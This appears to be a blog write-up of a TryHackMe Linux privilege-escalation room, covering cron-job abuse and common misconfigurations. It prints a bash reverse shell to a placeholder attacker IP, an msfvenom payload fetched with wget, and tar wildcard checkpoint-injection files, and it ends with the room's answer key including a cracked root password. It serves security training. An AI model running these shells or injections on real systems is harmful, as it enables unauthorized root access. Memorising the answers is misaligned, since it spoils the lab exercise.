In this video walk-through, we covered Linux Privilege Escalation through the cron tab in Linux. Cron tab includes all cron jobs of programs scheduled to run at specific time.

Introduction

Linux Privilege escalation is a critical concept in cybersecurity, allowing attackers or ethical hackers to gain higher privileges on a system. This article explores different techniques used for Linux privilege escalation, as demonstrated in the TryHackMe Linux PrivEsc module.

Overview

  • Focuses on escalating privileges in Linux systems through cron jobs by:
    • Modifying writable scripts.
    • Exploiting wildcards in commands.
    • Manipulating environment variables.

OSCP Study Notes

HackTheBox Certified Penetration Testing Specialist Study Notes

Understanding Privilege Escalation

Privilege escalation is the process of gaining elevated access to a system. There are two types:

  • Vertical Escalation: Moving from a low-privilege user to root.
  • Horizontal Escalation: Gaining access to another user’s account without increasing privilege level.

Common Linux Privilege Escalation Techniques

1. Exploiting Running Services

One of the common ways to escalate privileges is by exploiting services running as root. For example:

  • Checking for processes running under root using ps aux.
  • Exploiting MySQL running as root by injecting UDF (User Defined Functions).
  • Creating shared libraries to execute arbitrary commands as root.

2. Misconfigured File Permissions

Weak file permissions can be exploited for privilege escalation. For example:

  • If /etc/shadow (which stores password hashes) is readable by all users, an attacker can extract and crack password hashes using tools like John the Ripper.
  • If /etc/shadow is writable, an attacker can directly replace the root password.

3. Cracking Password Hashes

If an attacker can access password hashes, they can use tools like:

  • john the ripper to crack hashes.
  • hash-identifier to identify the hashing algorithm.

4. Exploiting SUID Binaries

Files with the SUID bit set run with the owner’s privileges. Exploiting these allows an attacker to execute commands as root.

  • Listing SUID binaries: find / -perm -4000 -type f 2>/dev/null
  • Running a SUID binary that spawns a shell: /usr/bin/some_suid_binary

5. Weak Password Policies

If a system has weak password policies:

  • Attackers can perform brute-force attacks.
  • Users may have reused passwords across different accounts, making credential stuffing attacks effective

Linux Cron Jobs

Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

1. Inspecting Cron Jobs

  • Command:
cat /etc/crontab

Purpose: Lists all scheduled cron jobs and their associated scripts.Example Output:

  • Two scripts identified: overwrite.sh and compressed.sh.

2. Privilege Escalation via Writable Cron Job Script

  • Steps:
    1. Locate the script:
locate overwrite.sh

2. Check script permissions:

ls -la /path/to/overwrite.sh

3. If writable, overwrite the script with a payload, such as a reverse shell.

Payload Example:

  • Reverse shell in overwrite.sh
bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1

Open a listener on your machine:

nc -lvnp <your_port>

Wait for the cron job to execute the modified script and receive a root shell.

3.Exploiting Wildcards in Commands

  • Target: compressed.sh, which uses a tar command with wildcards.
  • Steps:
    1. Create a reverse shell payload:bashCopy code
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f elf -o shell.elf

Transfer the payload to the target machine:

python3 -m http.server
wget http://<your_ip>:<your_port>/shell.elf

Create tar-compatible checkpoint files to exploit the wildcard

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.elf"

The cron job runs tar, which executes the payload due to the wildcard exploitation.

Manipulating Environment Variables

  • Context:
    • Cron jobs often rely on the PATH variable to locate scripts or binaries.
    • If PATH includes user-writable directories, malicious scripts can be executed instead of legitimate ones.
  • Steps:
    1. Inspect the PATH variable
cat /etc/crontab

Create a malicious script in a writable directory (e.g., /tmp or ~/):

nano /tmp/overwrite
  • Add a reverse shell or any malicious command.

Ensure execution permissions:

chmod +x /tmp/overwrite

The cron job will execute your malicious script due to the modified PATH.

Linux Privilege Escalation Checklist

  1. Writable Files and Directories:
    • Always check permissions (ls -la) to identify writable scripts or directories.
    • Modify scripts or binaries when permissions allow.
  2. Wildcards in Commands:
    • Exploit wildcards (*) in cron jobs using tools like tar to execute arbitrary commands.
  3. Environment Variables:
    • Check PATH values in /etc/crontab.
    • Place malicious scripts in directories included in the PATH variable.
  4. Safe Practices:
    • Update system tools like tar to prevent exploitation.
    • Avoid including writable directories in the PATH.

Incident Response and Mitigation

To prevent privilege escalation, security teams should:

  • Regularly update software to patch vulnerabilities.
  • Restrict permissions on critical files like /etc/shadow.
  • Monitor user activities for abnormal behavior.
  • Use strong authentication to prevent credential attacks.

Conclusion

  • Techniques Covered:
    • Modifying writable scripts.
    • Exploiting wildcards in cron jobs.
    • Using environment variables for privilege escalation.
  • Outcome:
    • Demonstrated how to escalate privileges to root using cron job vulnerabilities.

Linux privilege escalation is a crucial skill in penetration testing and security auditing. Understanding these techniques helps both attackers and defenders in strengthening system security. Ethical hackers use these methods for testing, while administrators should implement best practices to mitigate risks.

TryHackMe Linux Privesc | Room Answers

What is the root user’s password hash?

$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0

What hashing algorithm was used to produce the root user’s password hash?

sha512crypt

What is the root user’s password?

password123

Run the “id” command as the newroot user. What is the result?

uid=0(root) gid=0(root) groups=0(root)

How many programs is “user” allowed to run via sudo?

11

One program on the list doesn’t have a shell escape sequence on GTFOBins. Which is it?

apache2

What is the value of the PATH variable in /etc/crontab?

/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

What is the full mysql command the user executed?

mysql -h somehost.local -uroot -ppassword123

What file did you find the root user’s credentials in?

/etc/openvpn/auth.txt

What is the name of the option that disables root squashing?

no_root_squash

Video Walkthrough

 

 
, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles